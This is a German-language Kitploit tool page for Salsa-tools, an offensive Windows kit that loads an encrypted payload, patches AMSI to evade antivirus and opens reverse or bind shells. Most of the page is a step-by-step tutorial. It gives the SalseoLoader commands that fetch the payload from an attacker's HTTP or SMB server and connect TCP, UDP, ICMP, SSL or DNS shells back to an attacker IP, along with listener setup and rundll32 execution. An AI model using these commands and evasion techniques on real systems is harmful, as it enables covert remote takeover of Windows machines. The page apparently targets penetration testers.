Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Salsa-tools — Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY und AV-Bypass, AMSI gepatcht | Kitploit
Tools/GitHubGitHub/hackplayers/salsa-tools
Privilege EscalationVerschlüsselungs-/EntschlüsselungstoolsExploitationIDS/IPS-UmgehungLaterale BewegungShellcodePost-ExploitationCommand and ControlRed TeamingPayload-Entwicklung
GitHubhackplayers/salsa-tools
587130vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Salsa-tools

Salsa Tools - ShellReverse TCP/UDP/ICMP/DNS/SSL/BINDTCP/Shellcode/SILENTTRINITY und AV-Bypass, AMSI gepatcht

Repository anzeigen

License

root@kitploit:~
   _____       __              ______            __    
  / ___/____ _/ /________ _   /_  __/___  ____  / /____
  \__ \/ __ `/ / ___/ __ `/    / / / __ \/ __ \/ / ___/
 ___/ / /_/ / (__  ) /_/ /    / / / /_/ / /_/ / (__  ) 
/____/\__,_/_/____/\__,_/    /_/  \____/\____/_/____/  

Salsa Tools – Eine AV-sichere Reverse Shell getunkt in Bellota-Sauce

Salsa Tools ist eine Sammlung von drei verschiedenen Tools, die zusammen eine Reverse Shell unter Windows mit Steroiden ermöglichen, ohne dass für die Ausführung PowerShell benötigt wird. Um die neuesten Erkennungstechniken (AMSI) zu umgehen, wurden die meisten Komponenten ursprünglich in C# geschrieben. Salsa Tools wurde von Luis Vacas während seines Vortrags „Inmersión en la explotación tiene rima“ auf der h-c0n am 9. Februar 2019 veröffentlicht.

Funktionen

root@kitploit:~
* TCP/UDP/ICMP/DNS/BIND/SSL/Shellcode/SilentTrinity     
* AV-sicher (17. Februar)
* AMSI-Patcher
* PowerShell-Ausführung 
* ...

Übersicht

Salsa-Tools besteht aus drei verschiedenen Zutaten: - EvilSalsa - EncrypterAssembly - SalseoLoader Und sein Verhalten ist wie folgt:

Einrichtung

Voraussetzungen

  • Visual Studio 2017 (oder ähnlich)
    • Microsoft.PowerShell.3.ReferenceAssemblies-Abhängigkeiten beim Kompilieren unter .NET 4.0
    • Microsoft.PowerShell.2.ReferenceAssemblies-Abhängigkeiten beim Kompilieren unter .NET 3.5
  • Python 2.7

Salsa laufen lassen

EvilSalsa kochen

root@kitploit:~
   ___ __ __  ____  _            
  /  _]  |  |    || |           
 /  [_|  |  | |  | | |           
|    _]  |  | |  | | |___        
|   [_|  :  | |  | |     |       
|     |\   /  |  | |     |       
|_____| \_/  |____||_____|       
                                 
  _____  ____  _     _____  ____ 
 / ___/ /    || |   / ___/ /    |
(   \_ |  o  || |  (   \_ |  o  |
 \__  ||     || |___\__  ||     |
 /  \ ||  _  ||     /  \ ||  _  |
 \    ||  |  ||     \    ||  |  |
  \___||__|__||_____|\___||__|__|
  
[+] Das ist unser Payload
                                 

EvilSalsa ist die Schlüsselzutat dieses Rezepts. Es enthält den Payload, der auf dem System wie folgt ausgeführt wird: Sobald der Payload startet, wird System.Management.Automation.dll ausgeführt, die einen Runspace erstellt. Innerhalb dieses Runspace haben wir vier Arten von Shells (TCP / UDP / ICMP / DNS / BINDTCP / SHELLCODE / SILENTTRINITY). Sobald EvilSalsa geladen ist, wird als erstes die Existenz von c:\windows\system32\amsi.dll überprüft. Wenn es existiert, wird es mit einer hausgemachten Variante der CyberArk- und Rastamouse-Bypasses gepatcht.

EncrypterAssembly und Evilsalsa mischen

root@kitploit:~
  ______                             _            
 |  ____|                           | |           
 | |__   _ __   ___ _ __ _   _ _ __ | |_ ___ _ __ 
 |  __| | '_ \ / __| '__| | | | '_ \| __/ _ \ '__|
 | |____| | | | (__| |  | |_| | |_) | ||  __/ |   
 |______|_| |_|\___|_|   \__, | .__/ \__\___|_|   
     /\                   __/ | || |   | |        
    /  \   ___ ___  ___ _|___/|_|| |__ | |_   _   
   / /\ \ / __/ __|/ _ \ '_ ` _ \| '_ \| | | | |  
  / ____ \\__ \__ \  __/ | | | | | |_) | | |_| |  
 /_/    \_\___/___/\___|_| |_| |_|_.__/|_|\__, |  
                                           __/ |  
                                          |___/   
			  
 [+] Software, die den Payload mit RC4 verschlüsselt
 [+] Wir haben die Python-Version und die .exe-Version

EncrypterAssembly kann als Python-Skript oder als Exe-Binärdatei verwendet werden. Es verschlüsselt den zuvor generierten EvilSalsa.

Python-Verwendung:

root@kitploit:~
python encrypterassembly.py <DATEI> <PASSWORT> <AUSGABE>

Ausführbare Datei Verwendung:

root@kitploit:~
Encrypterassembly.exe <DATEI> <PASSWORT> <AUSGABE>

Den verschlüsselten EvilSalsa mit SalseoLoader auf den Tisch bringen

SalseoLoader ist dafür verantwortlich, den verschlüsselten Payload zu laden. Er kann sowohl als Bibliothek als auch als ausführbare Datei kompiliert werden. Wenn er als ausführbare Datei ausgeführt wird, müssen die gewählten Argumente beim Start der ausführbaren Datei angegeben werden. Wenn er als Bibliothek kompiliert wird, muss der Deskriptor "main" exportiert werden. Argumente werden über Umgebungsvariablen hinzugefügt.

root@kitploit:~
  _____  ____  _     _____   ___   ___
 / ___/ /    || |   / ___/  /  _] /   \
(   \_ |  o  || |  (   \_  /  [_ |     |
 \__  ||     || |___\__  ||    _]|  O  |
 /  \ ||  _  ||     /  \ ||   [_ |     |
 \    ||  |  ||     \    ||     ||     |
  \___||__|__||_____|\___||_____| \___/

 _       ___    ____  ___      ___  ____
| |     /   \  /    ||   \    /  _]|    \
| |    |     ||  o  ||    \  /  [_ |  D  )
| |___ |  O  ||     ||  D  ||    _]|    /
|     ||     ||  _  ||     ||   [_ |    \
|     ||     ||  |  ||     ||     ||  .  \
|_____| \___/ |__|__||_____||_____||__|\_|

                             By: CyberVaca@HackPlayers

[+] Verwendung:

    [-] SalseoLoader.exe passwort http://webserver.com/elfuckingmal.txt ReverseTCP LHOST LPORT
    [-] SalseoLoader.exe passwort \\smbserver.com\evil\elfuckingmal.txt ReverseUDP LHOST LPORT
    [-] SalseoLoader.exe passwort c:\temp\elfuckingmal.txt ReverseICMP LHOST
    [-] SalseoLoader.exe passwort http://webserver.com/elfuckingmal.txt ReverseDNS LHOST ServerDNS
    [-] SalseoLoader.exe passwort http://webserver.com/elfuckingmal.txt BindTCP LHOST LPORT
    [-] SalseoLoader.exe passwort c:\temp\elfuckingmal.txt ReverseSSL LHOST LPORT
    [-] SalseoLoader.exe passwort http://webserver.com/shellcode.txt shellcode
    [-] SalseoLoader.exe passwort http://webserver.com/silent.txt silenttrinity URL_C2C

[+] Verfügbare Payloads:

    [-] ReverseTCP  [-] ReverseDNS   [-] ReverseSSL  [-] Shellcode
    [-] ReverseUDP  [-] ReverseICMP  [-] BindTCP     [-] SilentTrinity

Tutorial

Kompilieren der Binärdateien

Laden Sie den Quellcode von GitHub herunter und kompilieren Sie EvilSalsa und SalseoLoader. Sie benötigen Visual Studio, um den Code zu kompilieren.

Kompilieren Sie diese Projekte für die Architektur der Windows-Umgebung, in der Sie sie verwenden möchten (wenn Windows x64 unterstützt, kompilieren Sie für diese Architektur).

Sie können die Architektur in Visual Studio im linken "Build"-Tab unter "Platform Target" auswählen.

(Falls Sie diese Optionen nicht finden, klicken Sie auf den "Projekt"-Tab und dann auf "-Eigenschaften")

Erstellen Sie dann beide Projekte (Build -> Build Solution) (In den Logs erscheint der Pfad zur ausführbaren Datei):

Die Backdoor vorbereiten

Zuerst müssen Sie die EvilSalsa.dll kodieren. Dazu können Sie das Python-Skript encrypterassembly.py verwenden oder das Projekt EncrypterAssembly kompilieren

Python

root@kitploit:~
python EncrypterAssembly/encrypterassembly.py <DATEI> <PASSWORT> <AUSGABEDATEI>
python EncrypterAssembly/encrypterassembly.py EvilSalsa.dll passwort evilsalsa.dll.txt

Windows

root@kitploit:~
EncrypterAssembly.exe <DATEI> <PASSWORT> <AUSGABEDATEI>
EncrypterAssembly.exe EvilSalsa.dll passwort evilsalsa.dll.txt

Ok, jetzt haben Sie alles, was Sie brauchen, um das gesamte Salseo-Ding auszuführen: die kodierte EvilSalsa.dll und die Binärdatei von SalseoLoader. Laden Sie die SalseoLoader.exe-Binärdatei auf die Maschine hoch. Sie sollte von keinem AV erkannt werden...

Die Backdoor ausführen

Eine TCP-Reverse-Shell erhalten (Herunterladen der kodierten DLL über HTTP)

Denken Sie daran, einen nc als Reverse-Shell-Listener und einen HTTP-Server zum Bereitstellen der kodierten evilsalsa zu starten.

SalseoLoader.exe passwort http://<Angreifer-IP>/evilsalsa.dll.txt reversetcp <Angreifer-IP> <Port>

Eine UDP-Reverse-Shell erhalten (Herunterladen der kodierten DLL über SMB)

Denken Sie daran, einen nc als Reverse-Shell-Listener und einen SMB-Server zum Bereitstellen der kodierten evilsalsa zu starten (impacket-smbserver).

SalseoLoader.exe passwort \\<Angreifer-IP>/ordner/evilsalsa.dll.txt reverseudp <Angreifer-IP> <Port>

Eine TCP-Reverse-Shell SSL erhalten (mit lokaler Datei)

Listener auf der Angreifermaschine einrichten:

root@kitploit:~
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
openssl s_server -key key.pem -cert cert.pem -port <port> -tls1

Backdoor ausführen:

root@kitploit:~
SalseoLoader.exe passwort C:/pfad/zu/evilsalsa.dll.txt ReverseSSL <Angreifer-IP> <Port>

Eine ICMP-Reverse-Shell erhalten (kodierte DLL bereits im Zielsystem)

Diesmal benötigen Sie ein spezielles Tool auf dem Client, um die Reverse-Shell zu empfangen. Download: [https://github.com/inquisb/icmpsh]

ICMP-Antworten deaktivieren:

root@kitploit:~

#Wenn Sie fertig sind, können Sie es wieder aktivieren mit:
sysctl -w net.ipv4.icmp_echo_ignore_all=0

Client ausführen:

python icmpsh_m.py "<Angreifer-IP>" "<Ziel-IP>"

Im Zielsystem das Salseo-Ding ausführen:

SalseoLoader.exe passwort C:/pfad/zu/evilsalsa.dll.txt reverseicmp <Angreifer-IP>

SalseoLoader als DLL mit exportierter main-Funktion kompilieren

Öffnen Sie das SalseoLoader-Projekt mit Visual Studio.

Vor der main-Funktion hinzufügen: [DllExport]

Fügen Sie vor der main-Funktion diese Zeile ein: [DllExport]

DllExport für dieses Projekt installieren

Tools --> NuGet-Paket-Manager --> NuGet-Pakete für Projektmappe verwalten...

Nach dem DllExport-Paket suchen (Registerkarte "Durchsuchen") und auf Installieren klicken (und das Popup akzeptieren)

In Ihrem Projektordner sind die Dateien DllExport.bat und DllExport_Configure.bat erschienen.

DllExport deinstallieren

Klicken Sie auf Deinstallieren (ja, es ist seltsam, aber vertrauen Sie mir, es ist notwendig)

Visual Studio beenden und DllExport_configure ausführen

Schließen Sie Visual Studio

Gehen Sie dann zu Ihrem SalseoLoader-Ordner und führen Sie DllExport_Configure.bat aus Wählen Sie x64 (wenn Sie es in einer x64-Umgebung verwenden möchten, das war bei mir der Fall), wählen Sie System.Runtime.InteropServices (unter Namespace for DllExport) und klicken Sie auf Übernehmen

Das Projekt erneut mit Visual Studio öffnen

[DllExport] sollte nicht mehr als Fehler markiert sein

Die Projektmappe erstellen

Ausgabetyp = Klassenbibliothek wählen (Projekt --> SalseoLoader-Eigenschaften --> Anwendung --> Ausgabetyp = Klassenbibliothek)

x64-Plattform wählen (Projekt --> SalseoLoader-Eigenschaften --> Build --> Plattformziel = x64)

Um die Projektmappe zu erstellen: Build --> Projektmappe erstellen (In der Ausgabekonsole erscheint der Pfad zur neuen DLL)

Die generierte DLL testen

Kopieren Sie die DLL dorthin, wo Sie sie testen möchten.

Ausführen:

rundll32.exe SalseoLoader.dll,main

Wenn kein Fehler erscheint, haben Sie wahrscheinlich eine funktionierende DLL!

Eine Shell mit der DLL erhalten

Vergessen Sie nicht, einen HTTP-Server und einen nc-Listener zu verwenden

PowerShell

root@kitploit:~
$env:pass="passwort"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main

CMD

root@kitploit:~
set pass=passwort
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main

Dokumentiert von https://github.com/carlospolop-forks/

Tool herunterladen